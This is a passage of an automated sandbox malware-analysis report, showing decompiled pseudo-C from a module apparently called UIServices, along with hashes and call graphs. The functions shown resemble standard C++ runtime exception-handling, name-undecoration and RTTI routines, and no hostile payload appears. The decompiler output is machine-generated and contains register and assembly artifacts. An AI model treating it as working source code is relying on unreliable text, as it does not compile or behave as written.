                                                    				E00007FFC7FFC235664B0(_t250);
                                                    				if ( *((long long*)(_t250 + 0x20)) == 0) goto 0x235633eb;
                                                    				E00007FFC7FFC235664B0(_t250);
                                                    				_t264 =  *((intOrPtr*)(_t250 + 0x20));
                                                    				E00007FFC7FFC235664B0(_t250);
                                                    				 *((char*)(_t306 + 0x60)) = 1;
                                                    				_t325 =  *((intOrPtr*)(_t250 + 0x28));
                                                    				E00007FFC7FFC2356F084(_t250,  *((intOrPtr*)(_t264 + 0x38)));
                                                    				if ( *_t264 != 0xe06d7363) goto 0x2356309e;
                                                    				if ( *((intOrPtr*)(_t264 + 0x18)) != 4) goto 0x2356309e;
                                                    				if ( *((intOrPtr*)(_t264 + 0x20)) - 0x19930520 - 2 > 0) goto 0x2356309e;
                                                    				if ( *((long long*)(_t264 + 0x30)) == 0) goto 0x235633e4;
                                                    				E00007FFC7FFC235664B0(_t250);
                                                    				if ( *(_t250 + 0x38) == 0) goto 0x235630e8;
                                                    				E00007FFC7FFC235664B0(_t250);
                                                    				E00007FFC7FFC235664B0(_t250);
                                                    				 *(_t250 + 0x38) =  *(_t250 + 0x38) & 0x00000000;
                                                    				if (E00007FFC7FFC23564E48(_t250, _t264, _t264,  *(_t250 + 0x38), __r9) != 0) goto 0x235630e3;
                                                    				if (E00007FFC7FFC23564F38(_t250, _t264,  *(_t250 + 0x38), __r9, _t304) != 0) goto 0x2356340b;
                                                    				__imp__terminate();
                                                    				asm("int3");
                                                    				E00007FFC7FFC235640EC(_t304 - 0x10, _t326,  *((intOrPtr*)(__r9 + 8)));
                                                    				if ( *_t264 != 0xe06d7363) goto 0x235633a0;
                                                    				if ( *((intOrPtr*)(_t264 + 0x18)) != 4) goto 0x235633a0;
                                                    				if ( *((intOrPtr*)(_t264 + 0x20)) - 0x19930520 - 2 > 0) goto 0x235633a0;
                                                    				if ( *((intOrPtr*)(_t304 - 0x10)) <= 0) goto 0x23563372;
                                                    				 *((intOrPtr*)(_t306 + 0x28)) =  *((intOrPtr*)(_t304 + 0x100));
                                                    				 *(_t306 + 0x20) = _t326;
                                                    				r8d = _t208;
                                                    				_t163 = E00007FFC7FFC2356EA68(_t264, _t304 - 0x58, _t304 - 0x10, _t302, _t303);
                                                    				asm("movups xmm0, [ebp-0x58]");
                                                    				asm("movdqu [ebp-0x78], xmm0");
                                                    				asm("psrldq xmm0, 0x8");
                                                    				asm("movd eax, xmm0");
                                                    				if (_t163 -  *((intOrPtr*)(_t304 - 0x40)) >= 0) goto 0x23563372;
                                                    				_t164 =  *((intOrPtr*)(_t304 - 0x70));
                                                    				 *((long long*)(_t304 - 0x80)) =  *((intOrPtr*)(_t304 - 0x58));
                                                    				 *((intOrPtr*)(_t306 + 0x68)) = _t164;
                                                    				asm("inc ecx");
                                                    				asm("dec ax");
                                                    				asm("movups [ebp-0x78], xmm0");
                                                    				if (_t164 - _t208 > 0) goto 0x235632d1;
                                                    				if (_t208 - _t164 > 0) goto 0x235632d1;
                                                    				_t252 =  *((intOrPtr*)(_t303 + 0x10));
                                                    				r9d =  *_t252;
                                                    				E00007FFC7FFC23564070(_t252, _t304 + 0x20, _t304 - 0x78,  *((intOrPtr*)(_t303 + 8)));
                                                    				_t166 =  *((intOrPtr*)(_t304 + 0x20));
                                                    				r12d = 0;
                                                    				 *((intOrPtr*)(_t306 + 0x64)) = r12d;
                                                    				 *((intOrPtr*)(_t306 + 0x6c)) = _t166;
                                                    				if (_t166 == 0) goto 0x235632ca;
                                                    				asm("movups xmm0, [ebp+0x38]");
                                                    				asm("movups xmm1, [ebp+0x48]");
                                                    				asm("movups [ebp-0x38], xmm0");
                                                    				asm("movsd xmm0, [ebp+0x58]");
                                                    				asm("movsd [ebp-0x18], xmm0");
                                                    				asm("movups [ebp-0x28], xmm1");
                                                    				E00007FFC7FFC2356F058(_t252);
                                                    				_t254 = _t252 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t264 + 0x30)) + 0xc));
                                                    				 *((long long*)(_t306 + 0x70)) = _t254;
                                                    				E00007FFC7FFC2356F058(_t254);
                                                    				r15d =  *((intOrPtr*)(_t254 +  *((intOrPtr*)( *((intOrPtr*)(_t264 + 0x30)) + 0xc))));
                                                    				if (r15d <= 0) goto 0x23563250;
                                                    				E00007FFC7FFC2356F058(_t254);
                                                    				_t323 = _t254 +  *((intOrPtr*)( *((intOrPtr*)(_t306 + 0x70))));
                                                    				if (E00007FFC7FFC23563A78(_t209, _t264, _t304 - 0x38, _t323, _t302, _t303,  *((intOrPtr*)(_t264 + 0x30))) != 0) goto 0x2356326d;
                                                    				 *((long long*)(_t306 + 0x70)) =  *((long long*)(_t306 + 0x70)) + 4;
                                                    				r15d = r15d - 1;
                                                    				if (r15d > 0) goto 0x23563216;
                                                    				r12d =  *((intOrPtr*)(_t306 + 0x64));
                                                    				E00007FFC7FFC23564700( *((intOrPtr*)(_t306 + 0x70)), _t304 + 0x20);
                                                    				r12d = r12d + 1;
                                                    				 *((intOrPtr*)(_t306 + 0x64)) = r12d;
                                                    				if (r12d ==  *((intOrPtr*)(_t306 + 0x6c))) goto 0x235632c6;
                                                    				goto 0x235631cd;
                                                    				 *((char*)(_t306 + 0x58)) =  *((intOrPtr*)(_t304 + 0xf8));
                                                    				_t278 = _t264;
                                                    				 *((char*)(_t306 + 0x50)) =  *((intOrPtr*)(_t306 + 0x60));
                                                    				 *((long long*)(_t306 + 0x48)) =  *((intOrPtr*)(_t304 - 0x60));
                                                    				 *((intOrPtr*)(_t306 + 0x40)) =  *((intOrPtr*)(_t304 + 0x100));
                                                    				 *((long long*)(_t306 + 0x38)) = _t304 - 0x78;
                                                    				 *((long long*)(_t306 + 0x30)) = _t323;
                                                    				 *((long long*)(_t306 + 0x28)) = _t304 - 0x38;
                                                    				 *(_t306 + 0x20) = _t326;
                                                    				 *((char*)(_t306 + 0x61)) = 1;
                                                    				E00007FFC7FFC23562970(_t266[0x7ffc23570420], _t264, _t278,  *((intOrPtr*)(_t306 + 0x78)), _t325, _t303);
                                                    				_t331 =  *((intOrPtr*)(_t304 - 0x80));
                                                    				_t297 =  *((intOrPtr*)(_t331 + 8)) -  *((char*)(_t278 + 0x7ffc23570410));
                                                    				 *((long long*)(_t331 + 8)) = _t297;
                                                    				 *(_t331 + 0x18) =  *(_t297 - 4) >>  *(_t278 + 0x7ffc23570420);
                                                    				_t298 = _t297 -  *((char*)(_t278 + 0x7ffc23570410));
                                                    				 *((long long*)(_t331 + 8)) = _t298;
                                                    				 *(_t331 + 0x1c) =  *(_t298 - 4) >>  *(_t278 + 0x7ffc23570420);
                                                    				_t299 = _t298 -  *((char*)(_t278 + 0x7ffc23570410));
                                                    				 *(_t331 + 0x20) =  *(_t299 - 4) >>  *(_t278 + 0x7ffc23570420);
                                                    				_t117 = _t299 + 4; // 0x4
                                                    				_t262 = _t117;
                                                    				 *((long long*)(_t331 + 8)) = _t299;
                                                    				 *((intOrPtr*)(_t331 + 0x24)) =  *_t299;
                                                    				_t203 =  *((intOrPtr*)(_t306 + 0x68)) + 1;
                                                    				 *((long long*)(_t331 + 8)) = _t262;
                                                    				 *((intOrPtr*)(_t306 + 0x68)) = _t203;
                                                    				if (_t203 -  *((intOrPtr*)(_t304 - 0x40)) < 0) goto 0x2356317c;
                                                    				if ( *((char*)(_t306 + 0x61)) != 0) goto 0x235633d8;
                                                    				if (( *_t326 & 0x00000040) == 0) goto 0x235633d8;
                                                    				if (E00007FFC7FFC2356E798(_t326) != 0) goto 0x235633d8;
                                                    				E00007FFC7FFC235664B0(_t262);
                                                    				 *((long long*)(_t262 + 0x20)) = _t264;
                                                    				E00007FFC7FFC235664B0(_t262);
                                                    				 *((long long*)(_t262 + 0x28)) = _t325;
                                                    				__imp__terminate();
                                                    				asm("int3");
                                                    				if ( *((intOrPtr*)(_t304 - 0x10)) <= 0) goto 0x235633d8;
                                                    				if ( *((char*)(_t304 + 0xf8)) != 0) goto 0x235633e4;
                                                    				 *((long long*)(_t306 + 0x38)) = _t323;
                                                    				 *((intOrPtr*)(_t306 + 0x30)) =  *((intOrPtr*)(_t304 + 0x100));
                                                    				 *((intOrPtr*)(_t306 + 0x28)) = _t208;
                                                    				 *(_t306 + 0x20) = _t326;
                                                    				E00007FFC7FFC23563648(_t204, _t264, _t331, _t325, _t303);
                                                    				E00007FFC7FFC235664B0(_t262);
                                                    				if ( *((long long*)(_t262 + 0x38)) == 0) goto 0x235633eb;
                                                    				abort();
                                                    				asm("int3");
                                                    				return E00007FFC7FFC2356F5B0(_t203, _t262,  *(_t304 + 0x70) ^ _t306, _t331);
                                                    			}



































                                                    0x7ffc23562f39
                                                    0x7ffc23562f41
                                                    0x7ffc23562f48
                                                    0x7ffc23562f4f
                                                    0x7ffc23562f52
                                                    0x7ffc23562f56
                                                    0x7ffc23562f6a
                                                    0x7ffc23562f6f
                                                    0x7ffc23562f75
                                                    0x7ffc23562f79
                                                    0x7ffc23562f7c
                                                    0x7ffc23562f84
                                                    0x7ffc23562f89
                                                    0x7ffc23562f94
                                                    0x7ffc23562f96
                                                    0x7ffc23562f9f
                                                    0x7ffc23562fab
                                                    0x7ffc23562fad
                                                    0x7ffc23562fb6
                                                    0x7ffc23562fb8
                                                    0x7ffc23562fbd
                                                    0x7ffc23562fc0
                                                    0x7ffc23562fc5
                                                    0x7ffc23562fcf
                                                    0x7ffc23562fe1
                                                    0x7ffc23562ff1
                                                    0x7ffc2356300a
                                                    0x7ffc23563010
                                                    0x7ffc2356301c
                                                    0x7ffc23563026
                                                    0x7ffc23563037
                                                    0x7ffc23563042
                                                    0x7ffc23563048
                                                    0x7ffc23563052
                                                    0x7ffc23563058
                                                    0x7ffc2356305d
                                                    0x7ffc23563061
                                                    0x7ffc2356306a
                                                    0x7ffc2356306f
                                                    0x7ffc23563073
                                                    0x7ffc2356307e
                                                    0x7ffc23563084
                                                    0x7ffc23563091
                                                    0x7ffc23563098
                                                    0x7ffc2356309e
                                                    0x7ffc235630a8
                                                    0x7ffc235630aa
                                                    0x7ffc235630b3
                                                    0x7ffc235630be
                                                    0x7ffc235630ca
                                                    0x7ffc235630d6
                                                    0x7ffc235630dc
                                                    0x7ffc235630e2
                                                    0x7ffc235630f3
                                                    0x7ffc235630fe
                                                    0x7ffc23563108
                                                    0x7ffc23563119
                                                    0x7ffc23563123
                                                    0x7ffc23563133
                                                    0x7ffc2356313e
                                                    0x7ffc23563143
                                                    0x7ffc23563146
                                                    0x7ffc2356314b
                                                    0x7ffc2356314f
                                                    0x7ffc23563154
                                                    0x7ffc23563159
                                                    0x7ffc23563160
                                                    0x7ffc23563171
                                                    0x7ffc23563174
                                                    0x7ffc23563178
                                                    0x7ffc2356317c
                                                    0x7ffc23563181
                                                    0x7ffc23563186
                                                    0x7ffc2356318c
                                                    0x7ffc23563198
                                                    0x7ffc2356319e
                                                    0x7ffc235631ae
                                                    0x7ffc235631b1
                                                    0x7ffc235631b6
                                                    0x7ffc235631b9
                                                    0x7ffc235631bc
                                                    0x7ffc235631c1
                                                    0x7ffc235631c7
                                                    0x7ffc235631cd
                                                    0x7ffc235631d1
                                                    0x7ffc235631d5
                                                    0x7ffc235631d9
                                                    0x7ffc235631de
                                                    0x7ffc235631e3
                                                    0x7ffc235631e7
                                                    0x7ffc235631f8
                                                    0x7ffc235631fb
                                                    0x7ffc23563200
                                                    0x7ffc2356320d
                                                    0x7ffc23563214
                                                    0x7ffc23563216
                                                    0x7ffc2356322a
                                                    0x7ffc2356323b
                                                    0x7ffc2356323d
                                                    0x7ffc23563243
                                                    0x7ffc23563249
                                                    0x7ffc2356324b
                                                    0x7ffc23563254
                                                    0x7ffc23563259
                                                    0x7ffc2356325c
                                                    0x7ffc23563266
                                                    0x7ffc23563268
                                                    0x7ffc2356327e
                                                    0x7ffc23563282
                                                    0x7ffc23563289
                                                    0x7ffc23563291
                                                    0x7ffc2356329c
                                                    0x7ffc235632a4
                                                    0x7ffc235632ad
                                                    0x7ffc235632b2
                                                    0x7ffc235632b7
                                                    0x7ffc235632bc
                                                    0x7ffc235632c1
                                                    0x7ffc235632c6
                                                    0x7ffc235632ec
                                                    0x7ffc235632f4
                                                    0x7ffc235632f8
                                                    0x7ffc23563313
                                                    0x7ffc2356331b
                                                    0x7ffc2356331f
                                                    0x7ffc2356333a
                                                    0x7ffc23563342
                                                    0x7ffc23563346
                                                    0x7ffc23563346
                                                    0x7ffc2356334a
                                                    0x7ffc23563350
                                                    0x7ffc23563358
                                                    0x7ffc2356335a
                                                    0x7ffc2356335e
                                                    0x7ffc23563365
                                                    0x7ffc23563370
                                                    0x7ffc23563376
                                                    0x7ffc23563385
                                                    0x7ffc23563387
                                                    0x7ffc2356338c
                                                    0x7ffc23563390
                                                    0x7ffc23563395
                                                    0x7ffc23563399
                                                    0x7ffc2356339f
                                                    0x7ffc235633a4
                                                    0x7ffc235633ad
                                                    0x7ffc235633b8
                                                    0x7ffc235633c0
                                                    0x7ffc235633c7
                                                    0x7ffc235633ce
                                                    0x7ffc235633d3
                                                    0x7ffc235633d8
                                                    0x7ffc235633e2
                                                    0x7ffc235633e4
                                                    0x7ffc235633ea
                                                    0x7ffc2356340a

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 211107550-393685449
                                                    • Opcode ID: 3d6be1f1c8a2245a47b14b00a023f54e19466ffc5ae8033eae6e49cb80112742
                                                    • Instruction ID: 0bd7d92021187cf91c87895daf8284ca26db572780269af2e2e838e94b49f491
                                                    • Opcode Fuzzy Hash: 3d6be1f1c8a2245a47b14b00a023f54e19466ffc5ae8033eae6e49cb80112742
                                                    • Instruction Fuzzy Hash: CCE1C173F086A98AE710DF24D8803AD7BA0FB44B58F144175DA9D677A5CF38E485CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1679 7ffc2356b6dc-7ffc2356b6ff 1680 7ffc2356b878-7ffc2356b886 1679->1680 1681 7ffc2356b705-7ffc2356b708 1679->1681 1682 7ffc2356b88a-7ffc2356b890 call 7ffc23566f74 1680->1682 1683 7ffc2356b70e-7ffc2356b711 1681->1683 1684 7ffc2356b796-7ffc2356b799 1681->1684 1692 7ffc2356b895-7ffc2356b8a7 1682->1692 1688 7ffc2356b713-7ffc2356b724 1683->1688 1689 7ffc2356b77a-7ffc2356b77d 1683->1689 1686 7ffc2356b7e1-7ffc2356b7e4 1684->1686 1687 7ffc2356b79b-7ffc2356b79f 1684->1687 1690 7ffc2356b7fd-7ffc2356b80d call 7ffc23568898 1686->1690 1691 7ffc2356b7e6-7ffc2356b7f8 call 7ffc23568558 1686->1691 1687->1690 1694 7ffc2356b7a1-7ffc2356b7a5 1687->1694 1695 7ffc2356b74e-7ffc2356b755 1688->1695 1696 7ffc2356b726-7ffc2356b72d 1688->1696 1689->1684 1693 7ffc2356b77f-7ffc2356b783 1689->1693 1712 7ffc2356b850-7ffc2356b857 1690->1712 1713 7ffc2356b80f-7ffc2356b816 1690->1713 1691->1692 1693->1684 1700 7ffc2356b785-7ffc2356b789 1693->1700 1694->1690 1701 7ffc2356b7a7-7ffc2356b7b9 1694->1701 1698 7ffc2356b75c-7ffc2356b775 call 7ffc23566cf4 1695->1698 1702 7ffc2356b734-7ffc2356b749 call 7ffc23566cf4 1696->1702 1698->1682 1700->1684 1707 7ffc2356b78b-7ffc2356b78f 1700->1707 1708 7ffc2356b7ce-7ffc2356b7dc 1701->1708 1709 7ffc2356b7bb-7ffc2356b7c9 1701->1709 1702->1692 1707->1684 1708->1698 1709->1702 1715 7ffc2356b869-7ffc2356b86c 1712->1715 1716 7ffc2356b859-7ffc2356b867 1712->1716 1714 7ffc2356b81d-7ffc2356b84e call 7ffc23566cf4 call 7ffc23566f74 1713->1714 1717 7ffc2356b870-7ffc2356b876 1714->1717 1715->1717 1716->1714 1717->1692
                                                    C-Code - Quality: 65%
                                                    			E00007FFC7FFC2356B6DC(void* __edx, void* __edi, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, void* __rsi, void* __r8, void* __r14, long long _a8, long long _a16) {
                                                    				char _v24;
                                                    				intOrPtr _v32;
                                                    				char _v40;
                                                    				intOrPtr _v48;
                                                    				void* _v56;
                                                    				intOrPtr _t49;
                                                    				char* _t66;
                                                    				char* _t69;
                                                    				char* _t70;
                                                    				char* _t73;
                                                    				long long* _t82;
                                                    				intOrPtr* _t94;
                                                    				intOrPtr* _t100;
                                                    
                                                    				_t102 = __rsi;
                                                    				_t50 = __edx;
                                                    				_a8 = __rbx;
                                                    				_a16 = __rdi;
                                                    				_t66 =  *0x23574360; // 0x0
                                                    				_t82 = __rcx;
                                                    				_t100 = __rdx;
                                                    				if ( *_t66 == 0) goto 0x2356b878;
                                                    				if (r8d == 0) goto 0x2356b796;
                                                    				if ( *_t66 != 0x58) goto 0x2356b77a;
                                                    				 *0x23574360 = _t66 + 1;
                                                    				_t94 =  &_v40;
                                                    				if ( *__rdx != __rcx) goto 0x2356b74e;
                                                    				_v48 = 4;
                                                    				_v56 = "void";
                                                    				asm("movaps xmm0, [ebp-0x30]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				E00007FFC7FFC23566CF4("void", __rcx, _t94);
                                                    				goto 0x2356b895;
                                                    				_t69 = "void ";
                                                    				_v48 = 5;
                                                    				_v56 = _t69;
                                                    				asm("movaps xmm0, [ebp-0x30]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				E00007FFC7FFC23566CF4(_t69,  &_v24, _t94);
                                                    				goto 0x2356b88a;
                                                    				if ( *_t69 != 0x5f) goto 0x2356b796;
                                                    				if ( *((char*)(_t69 + 1)) != 0x5f) goto 0x2356b796;
                                                    				if ( *((char*)(_t69 + 2)) != 0x5a) goto 0x2356b796;
                                                    				_t70 = _t69 + 3;
                                                    				 *0x23574360 = _t70;
                                                    				if ( *_t70 != 0x24) goto 0x2356b7e1;
                                                    				if ( *((char*)(_t70 + 1)) != 0x24) goto 0x2356b7fd;
                                                    				if ( *((char*)(_t70 + 2)) != 0x54) goto 0x2356b7fd;
                                                    				 *0x23574360 = _t70 + 3;
                                                    				if ( *_t94 != _t69) goto 0x2356b7ce;
                                                    				_v48 = 0xe;
                                                    				goto 0x2356b734;
                                                    				_t73 = "std::nullptr_t ";
                                                    				_v48 = 0xf;
                                                    				goto 0x2356b75c;
                                                    				if ( *_t73 != 0x59) goto 0x2356b7fd;
                                                    				 *0x23574360 = _t73 + 1;
                                                    				E00007FFC7FFC23568558(0, __edx, __edi, __rcx, __rcx,  &_v40, __rdx, __rsi);
                                                    				goto 0x2356b895;
                                                    				E00007FFC7FFC23568898(_t50, __edi, _t82,  &_v56,  &_v40, _t100, _t102, __r14);
                                                    				if (( *(_t100 + 8) & 0x00004000) == 0) goto 0x2356b850;
                                                    				_t75 = "cli::array<";
                                                    				_v32 = 0xb;
                                                    				_v40 = "cli::array<";
                                                    				asm("movaps xmm0, [ebp-0x20]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				E00007FFC7FFC23566CF4("cli::array<",  &_v24,  &_v40);
                                                    				E00007FFC7FFC23566F74(_t75,  &_v40,  &_v56);
                                                    				goto 0x2356b870;
                                                    				if (( *(_t100 + 8) & 0x00002000) == 0) goto 0x2356b869;
                                                    				_v32 = 0xd;
                                                    				goto 0x2356b81d;
                                                    				_t49 = _v48;
                                                    				 *_t82 = _v56;
                                                    				 *((intOrPtr*)(_t82 + 8)) = _t49;
                                                    				goto 0x2356b895;
                                                    				_v32 = _t49;
                                                    				_v40 = 0x23571ac0;
                                                    				return E00007FFC7FFC23566F74( &_v40, _t82, _t100);
                                                    			}
















                                                    0x7ffc2356b6dc
                                                    0x7ffc2356b6dc
                                                    0x7ffc2356b6dc
                                                    0x7ffc2356b6e1
                                                    0x7ffc2356b6ee
                                                    0x7ffc2356b6f5
                                                    0x7ffc2356b6fa
                                                    0x7ffc2356b6ff
                                                    0x7ffc2356b708
                                                    0x7ffc2356b711
                                                    0x7ffc2356b716
                                                    0x7ffc2356b720
                                                    0x7ffc2356b724
                                                    0x7ffc2356b72d
                                                    0x7ffc2356b734
                                                    0x7ffc2356b73b
                                                    0x7ffc2356b73f
                                                    0x7ffc2356b744
                                                    0x7ffc2356b749
                                                    0x7ffc2356b74e
                                                    0x7ffc2356b755
                                                    0x7ffc2356b75c
                                                    0x7ffc2356b764
                                                    0x7ffc2356b768
                                                    0x7ffc2356b76d
                                                    0x7ffc2356b775
                                                    0x7ffc2356b77d
                                                    0x7ffc2356b783
                                                    0x7ffc2356b789
                                                    0x7ffc2356b78b
                                                    0x7ffc2356b78f
                                                    0x7ffc2356b799
                                                    0x7ffc2356b79f
                                                    0x7ffc2356b7a5
                                                    0x7ffc2356b7ab
                                                    0x7ffc2356b7b9
                                                    0x7ffc2356b7c2
                                                    0x7ffc2356b7c9
                                                    0x7ffc2356b7ce
                                                    0x7ffc2356b7d5
                                                    0x7ffc2356b7dc
                                                    0x7ffc2356b7e4
                                                    0x7ffc2356b7ec
                                                    0x7ffc2356b7f3
                                                    0x7ffc2356b7f8
                                                    0x7ffc2356b801
                                                    0x7ffc2356b80d
                                                    0x7ffc2356b80f
                                                    0x7ffc2356b816
                                                    0x7ffc2356b81d
                                                    0x7ffc2356b825
                                                    0x7ffc2356b82d
                                                    0x7ffc2356b832
                                                    0x7ffc2356b842
                                                    0x7ffc2356b84e
                                                    0x7ffc2356b857
                                                    0x7ffc2356b860
                                                    0x7ffc2356b867
                                                    0x7ffc2356b869
                                                    0x7ffc2356b870
                                                    0x7ffc2356b873
                                                    0x7ffc2356b876
                                                    0x7ffc2356b87f
                                                    0x7ffc2356b882
                                                    0x7ffc2356b8a7

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                    • API String ID: 2943138195-2239912363
                                                    • Opcode ID: 68c5c0637b4c1963eeecbad4f09a755e943d175f319f11fa5f1955fc6c7127ce
                                                    • Instruction ID: 24dcdd33533ad6147acaa427e9f5c383fe6a8029ad75729388aea59d1de2c635
                                                    • Opcode Fuzzy Hash: 68c5c0637b4c1963eeecbad4f09a755e943d175f319f11fa5f1955fc6c7127ce
                                                    • Instruction Fuzzy Hash: F0512962F18B6A88FB11CB61EC452BC77B0FB48748F4441B5DA4D22B99DF3CA184CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 40%
                                                    			E00007FFC7FFC23565CAA(void* __edx, void* __eflags, long long __rbx, long long __rsi, void* __r8, void* __r9, long long _a16, long long _a24, char _a32) {
                                                    				void* _v40;
                                                    				void* _t8;
                                                    				long long _t17;
                                                    				char* _t20;
                                                    				long long _t26;
                                                    
                                                    				_t26 = __rsi;
                                                    				_t17 = __rbx;
                                                    				E00007FFC7FFC23565C28(_t8,  &_a32, "Access violation - no RTTI data!");
                                                    				_t20 =  &_a32;
                                                    				E00007FFC7FFC23566190(__rbx, _t20, 0x23573038, __rsi);
                                                    				asm("int3");
                                                    				asm("int3");
                                                    				asm("int3");
                                                    				_a16 = _t17;
                                                    				_a24 = _t26;
                                                    				if (_t20 != 0) goto 0x23565d16;
                                                    				return 0;
                                                    			}








                                                    0x7ffc23565caa
                                                    0x7ffc23565caa
                                                    0x7ffc23565cb6
                                                    0x7ffc23565cc2
                                                    0x7ffc23565cc7
                                                    0x7ffc23565ccd
                                                    0x7ffc23565cce
                                                    0x7ffc23565ccf
                                                    0x7ffc23565cd0
                                                    0x7ffc23565cd5
                                                    0x7ffc23565cf8
                                                    0x7ffc23565d15

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                    • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                    • API String ID: 1852475696-928371585
                                                    • Opcode ID: 57321e3e2beede4a271958e6e1a88a86d3ee191e10f4716107e611c04c83643e
                                                    • Instruction ID: 842b5807c340e59b7978a40ab02433595aa4d77fbc65d21ef66ebfe2d32bd8c9
                                                    • Opcode Fuzzy Hash: 57321e3e2beede4a271958e6e1a88a86d3ee191e10f4716107e611c04c83643e
                                                    • Instruction Fuzzy Hash: 1A51B472F58AAA92EE60CB10EC846B963A0FF44B84F404975DB8D57765DF3CE605CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 87%
                                                    			E00007FFC7FFC2356D854(void* __edx, void* __edi, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, void* __rsi, void* __r8, void* __r10, void* __r11, void* __r12) {
                                                    				intOrPtr _t51;
                                                    				signed int _t55;
                                                    				signed int _t65;
                                                    				signed int _t67;
                                                    				void* _t68;
                                                    				intOrPtr* _t88;
                                                    				char* _t89;
                                                    				char* _t91;
                                                    				char* _t92;
                                                    				char* _t93;
                                                    				char* _t95;
                                                    				long long* _t128;
                                                    				void* _t132;
                                                    				void* _t134;
                                                    				void* _t143;
                                                    
                                                    				_t143 = __r11;
                                                    				_t130 = __rsi;
                                                    				_t100 = __rbx;
                                                    				_t68 = __edx;
                                                    				 *((long long*)(_t134 + 8)) = __rbx;
                                                    				 *((long long*)(_t134 + 0x10)) = __rdi;
                                                    				_t132 = _t134 - 0x57;
                                                    				_t128 = __rcx;
                                                    				 *__rcx =  *((intOrPtr*)(__rdx));
                                                    				_t51 =  *((intOrPtr*)(__rdx + 8));
                                                    				 *((intOrPtr*)(__rcx + 8)) = _t51;
                                                    				if (_t51 - 1 > 0) goto 0x2356da43;
                                                    				_t88 =  *0x23574360; // 0x0
                                                    				 *(_t132 + 0xf) =  *(_t132 + 0xf) & 0x00000000;
                                                    				if ( *_t88 == 0) goto 0x2356da1b;
                                                    				 *(_t132 - 9) =  *(_t132 - 9) & 0x00000000;
                                                    				_t10 = _t132 - 9; // 0x5ff7
                                                    				 *(_t132 - 1) =  *(_t132 - 1) & 0x00000000;
                                                    				_t13 = _t132 + 7; // 0x6007
                                                    				 *(_t132 + 7) =  *(_t132 + 7) & 0x00000000;
                                                    				_t16 = _t132 + 0x17; // 0x6017
                                                    				 *(_t134 - 0x90 + 0x20) =  *(_t134 - 0x90 + 0x20) & 0x00000000;
                                                    				r8d = 0;
                                                    				E00007FFC7FFC23568F1C(__edi, __rbx, _t16, _t13, __rcx, __rsi, _t10);
                                                    				r8b = 0x20;
                                                    				_t19 = _t132 + 0x27; // 0x6027
                                                    				_t20 = _t132 + 0x17; // 0x6017
                                                    				E00007FFC7FFC23566FA0(_t20, _t19);
                                                    				_t21 = _t132 + 0x37; // 0x6037
                                                    				E00007FFC7FFC23566F74(_t88, _t21, _t128);
                                                    				 *_t128 =  *_t88;
                                                    				_t55 =  *(_t88 + 8);
                                                    				 *(_t128 + 8) = _t55;
                                                    				if (_t55 - 1 > 0) goto 0x2356da43;
                                                    				_t89 =  *0x23574360; // 0x0
